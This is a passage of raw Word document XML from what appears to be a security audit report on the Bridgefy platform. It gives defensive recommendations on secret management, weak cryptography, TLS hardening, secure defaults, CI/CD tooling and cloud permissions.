          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>191</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="367" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Secret Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should be improved to ensure application secrets are not disclosed via hardcoded credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Instead, these ought to be stored outside of the source code to reduce the potential for leaks and privilege escalation throughout the infrastructure. Special care should be taken to ensure credentials are also removed from the github history. The development team should then perform global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>searches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>educate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>developers to avoid similar issues in the future. More broadly, adequate IT security and DevSecOps procedures are needed at the infrastructure level. Insecure storage of secrets was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pipeline,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>strongly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>suggests the whole process should be reviewed holistically and improved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Removal of Unsafe Crypto Functions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy should completely eliminate any presence of cryptographic algorithms with known security weaknesses in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>its entire codebase. The development team should instead leverage cryptographically-safe functions for adequate security of tokens, hashes, passwords and any other application areas (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="367" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: A number of servers support insecure TLS protocols with publicly known security vulnerabilities (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>effort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>made</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to address these issues and ensure the TLS configuration is hardened to protect users from Man-In-The-Middle (MitM) attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Secure Defaults </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>need to be implemented where possible for best security. For </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2160" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2160" w:right="366" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy websites should disable all unneeded functionality, such as XMLRPC Ping backs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), as this increases the attack surface and can result in unwanted weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2160" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2160" w:right="372" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Accessing the MongoDB (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), connecting as Admin to EMQX (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>performing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Varnish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>modification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-044</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) should all require IP whitelisting and MFA where possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CI/CD Pipelines &amp; Security Tool Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: The platform would benefit from implementing security tools in AWS and CI/CD pipelines. Multiple AWS tools should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enabled,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>their</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reviewed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>regular</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>basis (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Additionally, every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pipelines,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and pipelines should be blocked when there are any reported issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="363" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cloud Configuration Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: The cloud configuration should be hardened by restricting user permissions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). After this, network access control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487636992">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>157325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="125" name="Graphic 125"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="125" name="Graphic 125"/>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2.387842pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15679488;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape94" coordorigin="1440,248" coordsize="2880,0" path="m1440,248l4320,248e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>190</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId144">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://snyk.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>191</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId287">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/renovatebot/renovate</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>to services should be restricted, as an example, MongoDB Admin access could be gained due to missing IP whitelisting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). Other improvement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
